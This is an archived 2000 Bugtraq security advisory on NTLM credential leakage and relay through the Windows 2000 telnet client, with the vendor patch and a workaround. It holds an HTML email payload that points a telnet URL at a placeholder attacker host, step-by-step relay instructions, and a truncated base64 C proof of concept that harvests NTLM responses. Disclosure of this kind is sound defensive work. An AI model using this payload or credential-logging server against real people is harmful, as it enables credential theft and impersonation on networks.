Bugtraq mailing list archives
@stake Advisory: NTLM Replaying via Windows 2000 Telnet Client (A 091400-1)
From: "@stake Advisories" <advisories () ATSTAKE COM>
Date: Thu, 14 Sep 2000 14:27:43 -0400
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I wish this could have gone out sooner but there was an issue with
the initial Microsoft patch which we found during our testing. They
subsequently decided to fix the patch which delayed things a bit.
We feel that if a vendor is taking an issue seriously and working
diligently on a patch that we should hold off on vulnerability details
and demonstration code until they have a chance to complete the fix
properly.
Be advised that the URLs included in the Vendor Response section of our
advisory may not have replicated to all the Microsoft web servers yet.
Weld Pond
weld () atstake com
@stake Inc.
www.atstake.com
Security Advisory
Advisory Name: NTLM Replaying via Windows 2000 Telnet Client (A091400-1)
Release Date: 09/14/2000
Application: Windows 2000 Telnet Client
Platform: Windows 2000
Severity: Attacker can impersonate users on the network
Author: DilDog [dildog () atstake com]
Vendor Status: Vendor has patch
Web: www.atstake.com/research/advisories/2000/a091400-1.txt
Executive Summary:
The telnet client in Windows 2000 may be launched via e-mail or
web browsing, causing undesirable outbound authentication over the
Internet to an untrusted third party. This can lead to compromised
passwords or stolen credentials.
Overview:
The console telnet client that is packaged with Windows 2000
performs NTLM authentication by default, assuming that is going to be
connecting to a Windows 2000 telnet server. This, however, is not
necessarily the case, and it attempts authentication with any host it
contacts. This combined with the fact that many email and web browser
packages will parse the "telnet://" protocol and launch the telnet client
to the desired host can lead to outbound NTLM authentications. These
authentications can be cracked to determine passwords, or replayed to
illegitimately access networked resources. The protocol used in the NTLM
telnet transaction is described in detail below, and a proof of concept
tool is provided that demonstrates the negotiation and logs responses from
the client.
Detailed Description:
Windows 2000 is packaged with a console mode telnet client,
specially designed for connecting to the Windows Telnet Server. Amongst
the modifications to the standard telnet protocol, Microsoft has added a
negotiation type to authenticate via NTLM with the target server, per the
IETF working draft:
http://www.ietf.org/internet-drafts/draft-tso-telnet-auth-enc-05.txt
The NTLM protocol is authentication type 15. The telnet client will
attempt negotiation with any server on the Internet, regardless of zone
control or otherwise, unless NTLM authentication has been disabled in the
telnet client (it is on by default).
Initially, this seems benign, but when combined with the fact that
Microsoft Internet Explorer, Outlook, Outlook Express, and Netscape
Navigator and Messenger will all open telnet automatically when they
encounter a "telnet://" URL. This allows an attacker to craft an email in
the following format that forces an outbound authentication over any port:
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet://evil.ip.address:port>
</frameset>
</html>
Note that this attack affects a multitude of HTML parsers, and is not
reliant upon any form of Active Scripting, Javascript or otherwise, to
launch the telnet client to the desired host.
One of the severe ramafications of this is the ability for the NTLM
challenge/response to be replayed to access a network resource. The
scenario is as follows:
A=attacker
C=client
S=server (network resource to attack)
C has legitimate access to S
1. 'A' sends evil framed email to 'C'.
2. 'C' reads email, opens telnet connection to 'A'
3. 'A' receives telnet connection and makes SMB connection to 'S'.
4. 'S' receives SMB connection and sends challenge to 'A'
5. 'A' sends challenge to 'C'.
6. 'C' receives challenge, encrypts with hash, and sends response to 'A'.
7. 'A' receives response and sends it to 'S'.
8. 'S' receives response and authenticates 'A' to access requested SMB
share.
Another attack that is possible, is that since the challenge is chosen by
the telnet server, a challenge could be specially chosen to send to the
telnet client such that the response more easily cracked than with a
random challenge. This effectively removes the extra complexity added by
the challenge response mechanism that one normally encounters while
attempting to crack passwords that were sniffed off of a network
transaction.
The normal NTLM challenge/response negotiation sequence occurs in the
telnet protocol data stream in the following fashion:
Nomenclature
============
IAC=255,DONT=254,DO=253,WONT=252,WILL=251,SB=250,SE=240
AUTH=37,IS=0,SEND=1,REPLY=2,NAME=3,NTLM=15
DD=32 bit little endian data
DW=16 bit little endian data
DB=8 bit little endian data
US=Unicode string, no extra null terminator
AS=Ansi string, no extra null terminator
Client Server
======================== ========================
IAC WILL AUTH
IAC SB AUTH
SEND NTLM 0x00 IAC SE
IAC SB AUTH
IS NTLM 0x00 0x00
DD 0x00000020 ; Length
DD 0x00000002 ; Type
AS "NTLMSSP\0" ; Signature
DD 0x00000001 ; Sequence #
DD 0xE0008297 ; ?Flags?
DD 0x00000000 ; Padding (room for client challenge?)
DD 0x00000000
DD 0x00000000
DD 0x00000000
IAC SE
IAC SB AUTH
REPLY NTLM 0x00 0x01
DD 0x000000A8 ; Length
DD 0x00000002 ; Type
AS "NTLMSSP\0" ; Signature
DD 0x00000002 ; Sequence#
DW 0x0014,0x0014 ; Field
; length (min/max)
DD 0x00000030 ; Offset
; from start
DD 0xE0828295 ; ?Flags?
DB 0x01 0x02 0x03 0x04 ; 8 byte
DB 0x02 0x03 0x04 0x05 ; Challenge
DD 0x00000000 ; Padding
DD 0x00000000
DW 0x0064,0x0064 ; Next
; Field
; length(min/max)
DD 0x00000044 ; Offset
; from start
... other fields...
IAC SB AUTH
IS NTLM 0x00 0x02
DD 0x000000B4 ; Length
DD 0x00000002 ; Type
AS "NTLMSSP\0" ; Signature
DD 0x00000003 ; Sequence
DW 0x0018,0x0018 ; NTLM Response Field length (min/max)
DD 0x00000074 ; NTLM Response Offset
DW 0x0018,0x0018 ; LM Response Field length (min/max)
DD 0x0000008C ; LM Response Offset
DW 0x0014,0x0014 ; Domain Name Field length (min/max)
DD 0x00000040 ; Domain Name Offset
DW 0x000C,0x000C ; User Name Field length (min/max)
DD 0x00000054 ; User Name Offset
DW 0x0014,0x0014 ; Machine Name Field length (min/max)
DD 0x00000060 ; Machine Name Offset
DW 0x0010,0x0010 ; ??? Field length (min/max)
DD 0x000000A4 ; ??? Offset
DD 0xE0808295 ; ?Flags?
US "ABCDEGHIJK" ; Domain Name
US "foobar" ; User Name
US "ABCDEGHIJK" ; Machine Name
DB 1,2,3,4,5,6,7,8 ; 24 Bytes of NTLM Response
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8 ; 24 Bytes of LM Response
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8
DB 1,2,3,4,5,6,7,8 ; 16 Bytes of Unknown Cruft
DB 1,2,3,4,5,6,7,8
IAC SE
IAC SB AUTH
REPLY NTLM 0x00 0x03
DD 0xFDFFF0FF ; Flags?
DB 0x18
....
Temporary Solution:
Run "telnet" at the command prompt, enter "unset ntlm" and then
exit telnet to save your preferences into the registry. You may go so far
as removing the telnet URL type from the registry if you are a proficient
registry hacker, unsetting the NTLM authentication should be sufficient
until an official patch is available.
Vendor Response:
Microsoft has released a bulletin and patch for this issue.
Bulletin MS00-067
http://www.microsoft.com/technet/security/bulletin/MS00-067.asp
Frequently Asked Questions:
http://www.microsoft.com/technet/security/bulletin/fq00-067.asp
Patch:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24319
Proof-of-Concept Code:
This code will act as a rogue telnet server, and send a constant
challenge of 0xFF bytes to any telnet client that connects to it, and it
logs the response to a disk file. The code was written under Linux.
=====================
Content-Description: NTLM Rogue Telnet Server
Content-Disposition: attachment; filename="talkntlm.cpp"
Content-Transfer-Encoding: BASE64
Content-Type: text/plain
LyogVGFsa05UTE0gLSBOVExNIExvZ2dpbmcgVGVsbmV0IFNlcnZlcgogKiBkaWxkb2dAYXRz
dGFrZS5jb20KICogOC8xNC8wMAogKiBDb3B5cmlnaHQgKEMpIDIwMDAgQHN0YWtlLCBJbmMu
CiAqLwoKI2luY2x1ZGU8c3RkaW8uaD4KI2luY2x1ZGU8c3RyaW5nLmg+CiNpbmNsdWRlPHVu
aXN0ZC5oPgojaW5jbHVkZTxzdGRsaWIuaD4KI2luY2x1ZGU8Y3R5cGUuaD4KI2luY2x1ZGU8
c3lzL3NvY2tldC5oPgojaW5jbHVkZTxzeXMvdHlwZXMuaD4KI2luY2x1ZGU8c3lzL3dhaXQu
aD4KI2luY2x1ZGU8bmV0aW5ldC9pbi5oPgojaW5jbHVkZTxhcnBhL2luZXQuaD4KCiNkZWZp
bmUgTUFKT1JfVkVSU0lPTiAxCiNkZWZpbmUgTUlOT1JfVkVSU0lPTiAwCgojZGVmaW5lIElB
QyAgICAgMjU1ICAgICAgICAgICAgIC8qIGludGVycHJldCBhcyBjb21tYW5kOiAqLwojZGVm
aW5lIERPTlQgICAgMjU0ICAgICAgICAgICAgIC8qIHlvdSBhcmUgbm90IHRvIHVzZSBvcHRp
b24gKi8KI2RlZmluZSBETyAgICAgIDI1MyAgICAgICAgICAgICAvKiBwbGVhc2UsIHlvdSB1
c2Ugb3B0aW9uICovCiNkZWZpbmUgV09OVCAgICAyNTIgICAgICAgICAgICAgLyogSSB3b24n
dCB1c2Ugb3B0aW9uICovCiNkZWZpbmUgV0lMTCAgICAyNTEgICAgICAgICAgICAgLyogSSB3
aWxsIHVzZSBvcHRpb24gKi8KI2RlZmluZSBTQiAgICAgIDI1MCAgICAgICAgICAgICAvKiBp
bnRlcnByZXQgYXMgc3VibmVnb3RpYXRpb24gKi8gICAgICAgICAgICAgIAojZGVmaW5lIFNF
ICAgICAgMjQwICAgICAgICAgICAgIC8qIGVuZCBzdWIgbmVnb3RpYXRpb24gKi8KI2RlZmlu
ZSBBVVRIICAgIDM3CiNkZWZpbmUgSVMgICAgICAwCiNkZWZpbmUgU0VORCAgICAxCiNkZWZp
bmUgUkVQTFkgICAyCiNkZWZpbmUgTkFNRSAgICAzCiNkZWZpbmUgTlRMTSAgICAxNQoKI2Rl
ZmluZSBBQ0NFUFQgMQoKdHlwZWRlZiBlbnVtIHsKICBNRVRIT0RfTk9ORT0wLAogIE1FVEhP
RF9URUxORVQKfSBNRVRIT0Q7Cgp0eXBlZGVmIGVudW0gewogIFNVQk1FVEhPRF9OT05FPTAs
CiAgU1VCTUVUSE9EX0xPRywKfSBTVUJNRVRIT0Q7CgojZGVmaW5lIENPTU1TT0NLX0JVRlNJ
WiAyMDQ4CkZJTEUgKmdfZkNvbW1Tb2NrOwpjaGFyIGdfQ29tbVNvY2tCdWZbQ09NTVNPQ0tf
QlVGU0laXTsKCnZvaWQgZXJyb3IoY29uc3QgY2hhciAqc3RyKQp7CiAgZmZsdXNoKHN0ZG91
dCk7CiAgZnByaW50ZihzdGRlcnIsc3RyKTsKICBmZmx1c2goc3RkZXJyKTsKfQoKdW5zaWdu
ZWQgY2hhciBnZXRiKHZvaWQpCnsKICB1bnNpZ25lZCBjaGFyIGI9MDsKICBmcmVhZCgmYiwx
LDEsZ19mQ29tbVNvY2spOwogIHJldHVybiBiOwp9Cgp1bnNpZ25lZCBzaG9ydCBnZXRkd2wo
dm9pZCkKewogIHVuc2lnbmVkIHNob3J0IHM9MDsKICBzfD0oKHVuc2lnbmVkIHNob3J0KWdl
dGIoKSk7CiAgc3w9KCh1bnNpZ25lZCBzaG9ydClnZXRiKCkpPDw4OwogIHJldHVybiBzOwp9
Cgp1bnNpZ25lZCBsb25nIGdldGRkbCh2b2lkKQp7CiAgdW5zaWduZWQgbG9uZyBsPTA7CiAg
bHw9KCh1bnNpZ25lZCBsb25nKWdldGIoKSk7CiAgbHw9KCh1bnNpZ25lZCBsb25nKWdldGIo
KSk8PDg7CiAgbHw9KCh1bnNpZ25lZCBsb25nKWdldGIoKSk8PDE2OwogIGx8PSgodW5zaWdu
ZWQgbG9uZylnZXRiKCkpPDwyNDsKICByZXR1cm4gbDsKfQoKdm9pZCBwdXRiKHVuc2lnbmVk
IGNoYXIgYykKewogIGZ3cml0ZSgmYywxLDEsZ19mQ29tbVNvY2spOwp9Cgp2b2lkIHB1dGR3
bCh1bnNpZ25lZCBzaG9ydCB3KQp7CiAgcHV0Yih3JjI1NSk7CiAgcHV0Yigodz4+OCkmMjU1
KTsKfQoKdm9pZCBwdXRkZGwodW5zaWduZWQgbG9uZyBkKQp7CiAgcHV0YihkJjI1NSk7CiAg
cHV0YigoZD4+OCkmMjU1KTsKICBwdXRiKChkPj4xNikmMjU1KTsKICBwdXRiKChkPj4yNCkm
MjU1KTsKfQoKCnZvaWQgcHV0YXJyYihpbnQgbiwgdW5zaWduZWQgY2hhciAqYikKewogIGlu
dCBpOwogIGZvcihpPTA7aTxuO2krKykgewogICAgcHV0YihiW2ldKTsKICB9Cn0KCnZvaWQg
cHV0YXJyYyhpbnQgbiwgY2hhciAqYykKewogIHB1dGFycmIobiwodW5zaWduZWQgY2hhciAq
KWMpOwp9Cgp2b2lkIHB1dGZsdXNoKHZvaWQpCnsKICBmZmx1c2goZ19mQ29tbVNvY2spOwp9
CgoKdm9pZCBkZWJ1Z2IodW5zaWduZWQgY2hhciBjKQp7CiAgZnByaW50ZihzdGRlcnIsIiVk
XHRcdCVYXHQnJWMnXG5cciIsYyxjLChpc2FsbnVtKGMpP2M6JyAnKSk7Cn0KCgppbnQgbGlz
dGVucG9ydChpbnQgcG9ydCwgc3RydWN0IHNvY2thZGRyX2luICpyc2FkZHIpCnsKICAvLyBD
cmVhdGUgc29ja2V0CiAgaW50IHM9c29ja2V0KEFGX0lORVQsU09DS19TVFJFQU0sSVBQUk9U
T19UQ1ApOwogIGlmKHM8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGNyZWF0ZSBzb2NrZXQu
XG4iKTsKICAgIHJldHVybiAtMTsKICB9CgogIGludCByZXVzZT0xOwogIGlmKHNldHNvY2tv
cHQocyxTT0xfU09DS0VULFNPX1JFVVNFQUREUiwmcmV1c2Usc2l6ZW9mKGludCkpPDApIHsK
ICAgIGVycm9yKCJjb3VsZG4ndCBzZXQgc29ja2V0IG9wdGlvbi5cbiIpOwogICAgY2xvc2Uo
cyk7CiAgICByZXR1cm4gLTI7CiAgfQoKICAvLyBCaW5kIHRvIHBvcnQKICBzdHJ1Y3Qgc29j
a2FkZHJfaW4gc2FkZHI7CiAgbWVtc2V0KCZzYWRkciwwLHNpemVvZihzdHJ1Y3Qgc29ja2Fk
ZHJfaW4pKTsKICBzYWRkci5zaW5fcG9ydD1odG9ucyhwb3J0KTsKICBzYWRkci5zaW5fZmFt
aWx5PUFGX0lORVQ7CiAKICBpZihiaW5kKHMsKHN0cnVjdCBzb2NrYWRkciAqKSZzYWRkcixz
aXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGJp
bmQuXG4iKTsKICAgIGNsb3NlKHMpOwogICAgcmV0dXJuIC0zOwogIH0KCiAgLy8gTGlzdGVu
IG9uIHBvcnQ7CiAgaWYobGlzdGVuKHMsMSk8MCkgewogICAgZXJyb3IoImNvdWxkbid0IGxp
c3Rlbi5cbiIpOwogICAgY2xvc2Uocyk7CiAgICByZXR1cm4gLTQ7CiAgfQoKICAvLyBBY2Nl
cHQgY29ubmVjdGlvbgogIHVuc2lnbmVkIGludCBzb2NrbGVuPXNpemVvZihzdHJ1Y3Qgc29j
a2FkZHJfaW4pOwogIG1lbXNldChyc2FkZHIsMCxzb2NrbGVuKTsKICBpbnQgYXM7CiAgaWYo
KGFzPWFjY2VwdChzLChzdHJ1Y3Qgc29ja2FkZHIgKilyc2FkZHIsJnNvY2tsZW4pKTwwKSB7
CiAgICBlcnJvcigiY291bGRuJ3QgYWNjZXB0LlxuIik7CiAgICBjbG9zZShzKTsKICAgIHJl
dHVybiAtNTsKICB9CgogIC8vIENsb3NlIGxpc3RlbmVyCiAgY2xvc2Uocyk7CiAgCiAgcmV0
dXJuIGFzOwp9CgppbnQgZG9fdGVsbmV0X2xvZyhpbnQgcG9ydCwgY2hhciAqbG9nZmlsZSkK
ewoKICBGSUxFICpsZj1OVUxMOwoKICB3aGlsZSgxKSB7CiAgICAKICAgIC8vIFdhaXQgZm9y
IHRlbG5ldCBjb25uZWN0aW9uIHRvIGNvbWUgaW4KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBz
YWRkcjsKICAgIGludCBzOwogICAgcHJpbnRmKCJsaXN0ZW5pbmcgb24gcG9ydCAlZC5cbiIs
cG9ydCk7CiAgICBpZigocz1saXN0ZW5wb3J0KHBvcnQsJnNhZGRyKSk8MCkgewogICAgICBl
cnJvcigidGVsbmV0IGxvZ2dpbmcgYWJvcnQuXG4iKTsKICAgICAgcmV0dXJuIC0xOwogICAg
fQogICAgcHJpbnRmKCJyZWNpZXZlZCB0ZWxuZXQgY29ubmVjdGlvbiBmcm9tICVzOiV1Llxu
IiwKCSAgIGluZXRfbnRvYShzYWRkci5zaW5fYWRkciksbnRvaHMoc2FkZHIuc2luX3BvcnQp
KTsKCiAgICAvLyBTZXQgdGhpcyBzb2NrZXQgYXMgb3V0IGJ1ZmZlcmVkIHBhY2tldCBzb2Nr
ZXQKICAgIGdfZkNvbW1Tb2NrPWZkb3BlbihzLCJyK2IiKTsKICAgIGlmKGdfZkNvbW1Tb2Nr
PT1OVUxMKSB7CiAgICAgIGVycm9yKCJjb3VsZG4ndCBmZG9wZW4gY29tbSBzb2NrZXQuXG4i
KTsKICAgICAgY2xvc2Uocyk7CiAgICAgIHJldHVybiAtMjsKICAgIH0KICAgIHNldHZidWYo
Z19mQ29tbVNvY2ssZ19Db21tU29ja0J1ZixfSU9GQkYsQ09NTVNPQ0tfQlVGU0laKTsKCiAg
ICAvLyBPcGVuIGxvZ2dpbmcgZmlsZQogICAgbGY9Zm9wZW4obG9nZmlsZSwiYSt0Iik7CiAg
ICBpZihsZj09TlVMTCkgewogICAgICBlcnJvcigiY291bGRuJ3Qgb3BlbiBsb2cgZmlsZS5c
biIpOwogICAgICBmY2xvc2UoZ19mQ29tbVNvY2spOwogICAgICByZXR1cm4gLTM7CiAgICB9
CiAgICAKICAgIC8vIENoYWxsZW5nZSB0byBzZW5kCiAgICB1bnNpZ25lZCBjaGFyIGNoYWxs
ZW5nZVs4XT17MjU1LDI1NSwyNTUsMjU1LDI1NSwyNTUsMjU1LDI1NX07CgogICAgLy8gU3Rh
cnQgYXV0aGVudGljYXRpb24gcHJvY2VzcwogICAgdW5zaWduZWQgY2hhciAqcmVzcGJ1Zj1O
VUxMOwogICAgaW50IHNpemU9MDsKICAgIAogICAgcHV0YihJQUMpOwogICAgcHV0YihETyk7
CiAgICBwdXRiKEFVVEgpOwogICAgcHV0Zmx1c2goKTsKICAgIHByaW50ZigiPj4gSUFDIERP
IEFVVEhcbiIpOwogICAgCiAgICAvLyBTZWUgaWYgY2xpZW50IHdhbnRzIHRvIGF1dGhlbnRp
Y2F0ZQogICAgaWYoZ2V0YigpIT1JQUMpIGdvdG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdl
dGIoKSE9V0lMTCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1BVVRIKSBn
b3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBwcmludGYoIjw8IElBQyBXSUxMIEFVVEhcbiIpOwog
ICAgCiAgICAvLyBQcmVzZW50IGF1dGhlbnRpY2F0aW9uIG1ldGhvZHMKICAgIHB1dGIoSUFD
KTsKICAgIHB1dGIoU0IpOwogICAgcHV0YihBVVRIKTsKICAgIHB1dGIoU0VORCk7CiAgICBw
dXRiKE5UTE0pOwogICAgcHV0YigwKTsKICAgIHB1dGIoSUFDKTsKICAgIHB1dGIoU0UpOwog
ICAgcHV0Zmx1c2goKTsKICAgIHByaW50ZigiPj4gSUFDIFNCIEFVVEggU0VORCBOVExNIDAg
SUFDIFNFXG4iKTsKICAgIAogICAgLy8gR2V0IE5UTE1TU1AgaW5pdGlhbCByZXF1ZXN0CiAg
ICBpZihnZXRiKCkhPUlBQykgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1T
QikgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT1BVVRIKSBnb3RvIHRlbG5l
dGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPUlTKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBp
ZihnZXRiKCkhPU5UTE0pIGdvdG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdldGIoKSE9MCkg
Z290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0YigpIT0wKSBnb3RvIHRlbG5ldGxvZ2Zh
aWw7CiAgICAKICAgIHNpemU9Z2V0ZGRsKCkrNDsKICAgIGlmKHNpemU+MjA0OCkgZ290byB0
ZWxuZXRsb2dmYWlsOwogICAgcmVzcGJ1Zj0odW5zaWduZWQgY2hhciAqKW1hbGxvYyhzaXpl
KTsKICAgIGludCBpOwogICAgZm9yKGk9MDtpPHNpemU7aSsrKSB7CiAgICAgIHJlc3BidWZb
aV09Z2V0YigpOwogICAgfQogICAgZnJlZShyZXNwYnVmKTsKICAgIGlmKGdldGIoKSE9SUFD
KSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPVNFKSBnb3RvIHRlbG5ldGxv
Z2ZhaWw7CiAgICAKICAgIHByaW50ZigiPDwgSUFDIFNCIEFVVEggSVMgTlRMTSAwIDAgLi4u
IElBQyBTRVxuIik7CiAgICAKICAgIC8vIFNlbmQgYWNjZXB0CiAgICBwdXRiKElBQyk7CiAg
ICBwdXRiKFNCKTsKICAgIHB1dGIoQVVUSCk7CiAgICBwdXRiKFJFUExZKTsKICAgIHB1dGIo
TlRMTSk7CiAgICBwdXRiKDApOwogICAgcHV0YihBQ0NFUFQpOwogICAgCiAgICBwdXRkZGwo
MHhBOCk7CiAgICBwdXRkZGwoMHgyKTsKICAgIHB1dGFycmMoOCwiTlRMTVNTUCIpOwogICAg
cHV0ZGRsKDB4Mik7CiAgICBwdXRkd2woMHgxNCk7CiAgICBwdXRkd2woMHgxNCk7CiAgICBw
dXRkZGwoMHgzMCk7CiAgICBwdXRkZGwoMHhFMDgyODI5NSk7CiAgICBwdXRhcnJiKDgsY2hh
bGxlbmdlKTsKICAgIHB1dGFycmMoOCwiXDBcMFwwXDBcMFwwXDBcMCIpOwogICAgcHV0ZHds
KDB4NjQpOwogICAgcHV0ZHdsKDB4NjQpOwogICAgcHV0ZGRsKDB4NDQpOwogICAgcHV0YXJy
YygyMCwiQVwwQlwwQ1wwRFwwRVwwRlwwR1wwSFwwSVwwSlwwIik7CiAgICBwdXRkd2woMHgy
KTsKICAgIHB1dGR3bCgweDE0KTsKICAgIHB1dGFycmMoMjAsIkFcMEJcMENcMERcMEVcMEZc
MEdcMEhcMElcMEpcMCIpOwogICAgcHV0ZHdsKDB4MSk7CiAgICBwdXRkd2woMHgxNCk7CiAg
ICBwdXRhcnJjKDIwLCJBXDBCXDBDXDBEXDBFXDBGXDBHXDBIXDBJXDBKXDAiKTsKICAgIHB1
dGR3bCgweDQpOwogICAgcHV0ZHdsKDB4MTQpOwogICAgcHV0YXJyYygyMCwiQVwwQlwwQ1ww
RFwwRVwwRlwwR1wwSFwwSVwwSlwwIik7CiAgICBwdXRkd2woMHgzKTsKICAgIHB1dGR3bCgw
eDE0KTsgIAogICAgcHV0YXJyYygyMCwiQVwwQlwwQ1wwRFwwRVwwRlwwR1wwSFwwSVwwSlww
Iik7CiAgICBwdXRkZGwoMCk7CgogICAgcHV0YihJQUMpOwogICAgcHV0YihTRSk7CiAgICBw
dXRmbHVzaCgpOwogICAgcHJpbnRmKCI+PiBJQUMgU0IgQVVUSCBSRVBMWSBOVExNIDAgMSAu
Li4gY2hhbGxlbmdlIC4uLiBJQUMgU0VcbiIpOwogIAogICAgLy8gR2V0IHRoZSByZXBseSBw
YWNrZXQKICAgIGlmKGdldGIoKSE9SUFDKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihn
ZXRiKCkhPVNCKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPUFVVEgpIGdv
dG8gdGVsbmV0bG9nZmFpbDsKICAgIGlmKGdldGIoKSE9SVMpIGdvdG8gdGVsbmV0bG9nZmFp
bDsKICAgIGlmKGdldGIoKSE9TlRMTSkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgaWYoZ2V0
YigpIT0wKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPTIpIGdvdG8gdGVs
bmV0bG9nZmFpbDsKCiAgICBzaXplPWdldGRkbCgpKzQ7CiAgICBpZihzaXplPjIwNDggfHwg
c2l6ZTw2NCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgcHJpbnRmKCI4XG4iKTsKICAgIHJl
c3BidWY9KHVuc2lnbmVkIGNoYXIgKiltYWxsb2Moc2l6ZSk7CiAgICBmb3IoaT0wO2k8c2l6
ZTtpKyspIHsKICAgICAgcmVzcGJ1ZltpXT1nZXRiKCk7CiAgICAgIC8vZnByaW50ZihzdGRl
cnIsIiUyLjJYOiAiLGkpOwogICAgICAvL2RlYnVnYihyZXNwYnVmW2ldKTsKICAgIH0KICAg
IGlmKGdldGIoKSE9SUFDKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBpZihnZXRiKCkhPVNF
KSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CgogICAgcHJpbnRmKCI8PCBJQUMgU0IgQVVUSCBJUyBO
VExNIDAgMiAuLi4gcmVzcG9uc2UgLi4uIElBQyBTRVxuIik7CiAgICAKICAgIAogICAgLy8g
R2V0IHVzZXJuYW1lCiAgICBpbnQgdXNlcm5hbWVsZW4sdXNlcm5hbWVvZmY7CiAgICBjaGFy
ICp1c2VybmFtZTsKICAgIHVzZXJuYW1lbGVuPXJlc3BidWZbMHgyOF0gfCAocmVzcGJ1Zlsw
eDI5XTw8OCk7CiAgICB1c2VybmFtZW9mZj1yZXNwYnVmWzB4MkNdIHwgKHJlc3BidWZbMHgy
RF08PDgpIHwgCiAgICAgIChyZXNwYnVmWzB4MkVdPDwxNikgfCAocmVzcGJ1ZlsweDJGXTw8
MjQpOwogICAgdXNlcm5hbWU9KGNoYXIgKiltYWxsb2ModXNlcm5hbWVsZW4pOwogICAgaWYo
IXVzZXJuYW1lKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBtZW1jcHkodXNlcm5hbWUsJnJl
c3BidWZbdXNlcm5hbWVvZmYrNF0sdXNlcm5hbWVsZW4pOwogICAgcHJpbnRmKCJVc2VybmFt
ZTogIik7CiAgICBmb3IoaT0wO2k8dXNlcm5hbWVsZW47aSs9MikgewogICAgICBwcmludGYo
IiVjIix1c2VybmFtZVtpXSk7CiAgICAgIGZwcmludGYobGYsIiVjIix1c2VybmFtZVtpXSk7
CiAgICAgIHVzZXJuYW1lW2k+PjFdPXVzZXJuYW1lW2ldOwogICAgfQogICAgdXNlcm5hbWVs
ZW4+Pj0xOwogICAgcHJpbnRmKCJcbiIpOwogICAgZnByaW50ZihsZiwiOiIpOwogICAgZnJl
ZSh1c2VybmFtZSk7CiAgICAKICAgIC8vIEdldCBkb21haW5uYW1lCiAgICBpbnQgZG9tYWlu
bmFtZWxlbixkb21haW5uYW1lb2ZmOwogICAgY2hhciAqZG9tYWlubmFtZTsKICAgIGRvbWFp
bm5hbWVsZW49cmVzcGJ1ZlsweDIwXSB8IChyZXNwYnVmWzB4MjFdPDw4KTsKICAgIGRvbWFp
bm5hbWVvZmY9cmVzcGJ1ZlsweDI0XSB8IChyZXNwYnVmWzB4MjVdPDw4KSB8IAogICAgICAo
cmVzcGJ1ZlsweDI2XTw8MTYpIHwgKHJlc3BidWZbMHgyN108PDI0KTsKICAgIGRvbWFpbm5h
bWU9KGNoYXIgKiltYWxsb2MoZG9tYWlubmFtZWxlbik7CiAgICBpZighZG9tYWlubmFtZSkg
Z290byB0ZWxuZXRsb2dmYWlsOwogICAgbWVtY3B5KGRvbWFpbm5hbWUsJnJlc3BidWZbZG9t
YWlubmFtZW9mZis0XSxkb21haW5uYW1lbGVuKTsKICAgIHByaW50ZigiRG9tYWluOiAiKTsK
ICAgIGZvcihpPTA7aTxkb21haW5uYW1lbGVuO2krPTIpIHsKICAgICAgcHJpbnRmKCIlYyIs
ZG9tYWlubmFtZVtpXSk7CiAgICAgIGZwcmludGYobGYsIiVjIix1c2VybmFtZVtpXSk7CiAg
ICAgIGRvbWFpbm5hbWVbaT4+MV09ZG9tYWlubmFtZVtpXTsKICAgIH0KICAgIGRvbWFpbm5h
bWVsZW4+Pj0xOwogICAgcHJpbnRmKCJcbiIpOwogICAgZnByaW50ZihsZiwiOiIpOwogICAg
ZnJlZShkb21haW5uYW1lKTsKICAgIAogICAgLy8gV3JpdGUgY2hhbGxlbmdlCiAgICBmcHJp
bnRmKGxmLCIlMi4yWCUyLjJYJTIuMlglMi4yWCUyLjJYJTIuMlglMi4yWCUyLjJYOiIsCgkg
ICAgY2hhbGxlbmdlWzBdLGNoYWxsZW5nZVsxXSxjaGFsbGVuZ2VbMl0sY2hhbGxlbmdlWzNd
LAoJICAgIGNoYWxsZW5nZVs0XSxjaGFsbGVuZ2VbNV0sY2hhbGxlbmdlWzZdLGNoYWxsZW5n
ZVs3XSk7CgogICAgLy8gR2V0IE5UIHJlc3BvbnNlCiAgICBpbnQgbnRyZXNwbGVuLG50cmVz
cG9mZjsKICAgIHVuc2lnbmVkIGNoYXIgKm50cmVzcDsKICAgIG50cmVzcGxlbj1yZXNwYnVm
WzB4MTBdIHwgKHJlc3BidWZbMHgxMV08PDgpOwogICAgbnRyZXNwb2ZmPXJlc3BidWZbMHgx
NF07Ly8gfCAocmVzcGJ1ZlsweDE1XTw8OCkgfCAocmVzcGJ1ZlsweDE2XTw8MTYpIHwgKHJl
c3BidWZbMHgxN108PDI0KTsKICAgIG50cmVzcD0odW5zaWduZWQgY2hhciAqKW1hbGxvYyhu
dHJlc3BsZW4pOwogICAgaWYoIW50cmVzcCkgZ290byB0ZWxuZXRsb2dmYWlsOwogICAgbWVt
Y3B5KG50cmVzcCwmcmVzcGJ1ZltudHJlc3BvZmYrNF0sbnRyZXNwbGVuKTsKICAgIHByaW50
